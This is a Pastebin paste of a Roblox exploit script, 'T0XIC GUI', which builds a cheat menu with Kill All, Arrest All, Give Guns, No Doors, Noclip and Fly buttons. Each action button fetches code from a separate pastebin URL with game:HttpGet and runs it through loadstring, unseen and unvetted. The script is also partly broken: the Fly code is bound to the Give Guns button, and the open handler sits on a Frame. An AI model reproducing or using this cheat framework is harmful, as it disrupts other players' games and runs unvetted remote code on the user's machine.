Advertisement
Guest User

Ook

a guest
Nov 12th, 2019
142
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.80 KB | None | 0 0
  1. -- Instances:
  2.  
  3. local RobloxExploit = Instance.new("ScreenGui")
  4. local MainGUI = Instance.new("Frame")
  5. local Killall = Instance.new("TextButton")
  6. local T0XICTEXT = Instance.new("TextBox")
  7. local ArrestAll = Instance.new("TextButton")
  8. local credits = Instance.new("TextBox")
  9. local GiveGuns = Instance.new("TextButton")
  10. local NoDoors = Instance.new("TextButton")
  11. local Noclip = Instance.new("TextButton")
  12. local Clip = Instance.new("TextButton")
  13. local FlyE_ = Instance.new("TextButton")
  14. local exit = Instance.new("TextButton")
  15. local open = Instance.new("Frame")
  16. local TextButton = Instance.new("TextButton")
  17.  
  18. --[[
  19. Properties:
  20. --]]
  21.  
  22. MainGUI.Active = true
  23. MainGUI.Draggable = true
  24.  
  25. RobloxExploit.Name = "Roblox Exploit"
  26. RobloxExploit.Parent = game.CoreGui
  27.  
  28. MainGUI.Name = "Main GUI"
  29. MainGUI.Parent = RobloxExploit
  30. MainGUI.BackgroundColor3 = Color3.new(0.458824, 1, 0.368627)
  31. MainGUI.Position = UDim2.new(0.3567788, 0, 0.186228484, 0)
  32. MainGUI.Size = UDim2.new(0, 386, 0, 394)
  33. MainGUI.Visible = false
  34.  
  35. Killall.Name = "Kill all"
  36. Killall.Parent = MainGUI
  37. Killall.BackgroundColor3 = Color3.new(1, 1, 1)
  38. Killall.Position = UDim2.new(0.0518134721, 0, 0.237113416, 0)
  39. Killall.Size = UDim2.new(0, 153, 0, 39)
  40. Killall.Font = Enum.Font.SourceSans
  41. Killall.Text = "Kill All"
  42. Killall.TextColor3 = Color3.new(0, 0, 0)
  43. Killall.TextSize = 14
  44. Killall.MouseButton1Click:connect(function()
  45. loadstring(game:HttpGet(('https://pastebin.com/sgtLjQeE'),true))()
  46. end)
  47.  
  48. T0XICTEXT.Name = "T0XIC TEXT"
  49. T0XICTEXT.Parent = MainGUI
  50. T0XICTEXT.BackgroundColor3 = Color3.new(0.396078, 1, 0.32549)
  51. T0XICTEXT.Position = UDim2.new(0.246113986, 0, 0.0257731955, 0)
  52. T0XICTEXT.Size = UDim2.new(0, 196, 0, 31)
  53. T0XICTEXT.Font = Enum.Font.SourceSans
  54. T0XICTEXT.Text = "T0XIC GUI"
  55. T0XICTEXT.TextColor3 = Color3.new(0, 0, 0)
  56. T0XICTEXT.TextSize = 23
  57.  
  58. ArrestAll.Name = "Arrest All"
  59. ArrestAll.Parent = MainGUI
  60. ArrestAll.BackgroundColor3 = Color3.new(1, 1, 1)
  61. ArrestAll.Position = UDim2.new(0.549222827, 0, 0.237113401, 0)
  62. ArrestAll.Size = UDim2.new(0, 158, 0, 39)
  63. ArrestAll.Font = Enum.Font.SourceSans
  64. ArrestAll.Text = "Arrest All"
  65. ArrestAll.TextColor3 = Color3.new(0, 0, 0)
  66. ArrestAll.TextSize = 14
  67. ArrestAll.MouseButton1Click:connect(function()
  68. loadstring(game:HttpGet(('https://pastebin.com/1JXejA0S'),true))()
  69. end)
  70.  
  71. credits.Name = "credits"
  72. credits.Parent = MainGUI
  73. credits.BackgroundColor3 = Color3.new(0.380392, 1, 0.372549)
  74. credits.BorderColor3 = Color3.new(0.337255, 1, 0.337255)
  75. credits.Position = UDim2.new(0.0207253881, 0, 0.128865972, 0)
  76. credits.Size = UDim2.new(0, 370, 0, 19)
  77. credits.Font = Enum.Font.SourceSans
  78. credits.Text = "Credits: w o l f i e#0001 and You're lacking the permission#1111"
  79. credits.TextColor3 = Color3.new(0, 0, 0)
  80. credits.TextSize = 14
  81.  
  82. GiveGuns.Name = "Give Guns"
  83. GiveGuns.Parent = MainGUI
  84. GiveGuns.BackgroundColor3 = Color3.new(1, 1, 1)
  85. GiveGuns.Position = UDim2.new(0.0518134721, 0, 0.40206185, 0)
  86. GiveGuns.Size = UDim2.new(0, 153, 0, 39)
  87. GiveGuns.Font = Enum.Font.SourceSans
  88. GiveGuns.Text = "Give Guns"
  89. GiveGuns.TextColor3 = Color3.new(0, 0, 0)
  90. GiveGuns.TextSize = 14
  91. GiveGuns.MouseButton1Click:connect(function()
  92. loadstring(game:HttpGet(('https://pastebin.com/CXz2Yqp4'),true))()
  93. end)
  94.  
  95.  
  96. NoDoors.Name = "No Doors"
  97. NoDoors.Parent = MainGUI
  98. NoDoors.BackgroundColor3 = Color3.new(1, 1, 1)
  99. NoDoors.Position = UDim2.new(0.549222827, 0, 0.40206185, 0)
  100. NoDoors.Size = UDim2.new(0, 158, 0, 39)
  101. NoDoors.Font = Enum.Font.SourceSans
  102. NoDoors.Text = "No Doors"
  103. NoDoors.TextColor3 = Color3.new(0, 0, 0)
  104. NoDoors.TextSize = 14
  105. NoDoors.MouseButton1Click:connect(function()
  106. loadstring(game:HttpGet(('https://pastebin.com/R6EwGRGn'),true))()
  107. end)
  108.  
  109. Noclip.Name = "Noclip"
  110. Noclip.Parent = MainGUI
  111. Noclip.BackgroundColor3 = Color3.new(1, 1, 1)
  112. Noclip.Position = UDim2.new(0.0518134721, 0, 0.572164953, 0)
  113. Noclip.Size = UDim2.new(0, 153, 0, 39)
  114. Noclip.Font = Enum.Font.SourceSans
  115. Noclip.Text = "Noclip"
  116. Noclip.TextColor3 = Color3.new(0, 0, 0)
  117. Noclip.TextSize = 14
  118. Noclip.MouseButton1Click:connect(function()
  119. loadstring(game:HttpGet(('https://pastebin.com/dADcHxNH'),true))()
  120. end)
  121.  
  122. Clip.Name = "Clip"
  123. Clip.Parent = MainGUI
  124. Clip.BackgroundColor3 = Color3.new(1, 1, 1)
  125. Clip.Position = UDim2.new(0.549222827, 0, 0.572164953, 0)
  126. Clip.Size = UDim2.new(0, 158, 0, 39)
  127. Clip.Font = Enum.Font.SourceSans
  128. Clip.Text = "Clip"
  129. Clip.TextColor3 = Color3.new(0, 0, 0)
  130. Clip.TextSize = 14
  131. Clip.MouseButton1Click:connect(function()
  132. loadstring(game:HttpGet(('https://pastebin.com/56XxDPq1'),true))()
  133. end)
  134.  
  135. FlyE_.Name = "Fly(E_"
  136. FlyE_.Parent = MainGUI
  137. FlyE_.BackgroundColor3 = Color3.new(1, 1, 1)
  138. FlyE_.Position = UDim2.new(0.240932643, 0, 0.780927837, 0)
  139. FlyE_.Size = UDim2.new(0, 200, 0, 50)
  140. FlyE_.Font = Enum.Font.SourceSans
  141. FlyE_.Text = "Fly(E)"
  142. FlyE_.TextColor3 = Color3.new(0, 0, 0)
  143. FlyE_.TextSize = 14
  144. GiveGuns.MouseButton1Click:connect(function()
  145. loadstring(game:HttpGet(('https://pastebin.com/vFeXu0Ma'),true))()
  146. end)
  147.  
  148. exit.Name = "exit"
  149. exit.Parent = MainGUI
  150. exit.BackgroundColor3 = Color3.new(1, 1, 1)
  151. exit.Position = UDim2.new(0.91191709, 0, 0, 0)
  152. exit.Size = UDim2.new(0, 34, 0, 22)
  153. exit.Font = Enum.Font.SourceSans
  154. exit.Text = "x"
  155. exit.TextColor3 = Color3.new(0, 0, 0)
  156. exit.TextSize = 14
  157. exit.MouseButton1Click:connect(function()
  158. MainGUI.Visible = false
  159. open.Visible = true
  160. end)
  161.  
  162. open.Name = "open"
  163. open.Parent = RobloxExploit
  164. open.BackgroundColor3 = Color3.new(1, 1, 1)
  165. open.Position = UDim2.new(0, 0, 0.814416826, 0)
  166. open.Size = UDim2.new(0, 100, 0, 34)
  167.  
  168.  
  169. TextButton.Parent = open
  170. TextButton.BackgroundColor3 = Color3.new(1, 1, 1)
  171. TextButton.Size = UDim2.new(0, 100, 0, 34)
  172. TextButton.Font = Enum.Font.SourceSans
  173. TextButton.Text = "Open"
  174. TextButton.TextColor3 = Color3.new(0, 0, 0)
  175. TextButton.TextSize = 14
  176. open.MouseButton1Click:connect(function()
  177. MainGUI.visible = true
  178. open.Visible = false
  179. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement